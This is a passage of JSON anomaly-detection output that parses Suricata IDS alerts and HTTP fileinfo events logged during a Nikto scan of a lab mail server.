"{\"timestamp\":\"2020-03-04T19:18:34.162552+0000\",\"flow_id\":1625615040672730,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46776,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.rdf+destype=cache+desformat=PDF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.164694 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46778 -> 192.168.10.154:80", "/parser/model/time": 1583349514.164694, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46778, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.164694 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46778 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.pt-br", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.164854+0000\",\"flow_id\":1725795152854985,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46778,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pt-br\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pt-br\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.164854, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1725795152854985,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46778,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pt-br\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pt-br\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46778,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pt-br\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pt-br\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.pt-br\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.pt-br\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.pt-br", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.pt-br", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46778,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46778, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1725795152854985,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1725795152854985, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.164854+0000\",\"flow_id\":1725795152854985,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46778,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pt-br\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pt-br\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.16 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.166464 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46780 -> 192.168.10.154:80", "/parser/model/time": 1583349514.166464, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46780, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.166464 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46780 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.iso8859-8", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.166606+0000\",\"flow_id\":392624419276641,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46780,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-8\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-8\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.166606, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":392624419276641,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46780,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-8\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-8\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46780,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-8\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-8\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.iso8859-8\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.iso8859-8\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.iso8859-8", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.iso8859-8", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46780,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46780, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":392624419276641,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 392624419276641, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.166606+0000\",\"flow_id\":392624419276641,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46780,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-8\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-8\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.168173 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46782 -> 192.168.10.154:80", "/parser/model/time": 1583349514.168173, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46782, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.168173 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46782 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.types", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.168368+0000\",\"flow_id\":941400980622918,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46782,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.types\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.types\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.168368, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":941400980622918,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46782,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.types\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.types\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46782,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.types\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.types\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.types\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.types\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.types", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.types", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", 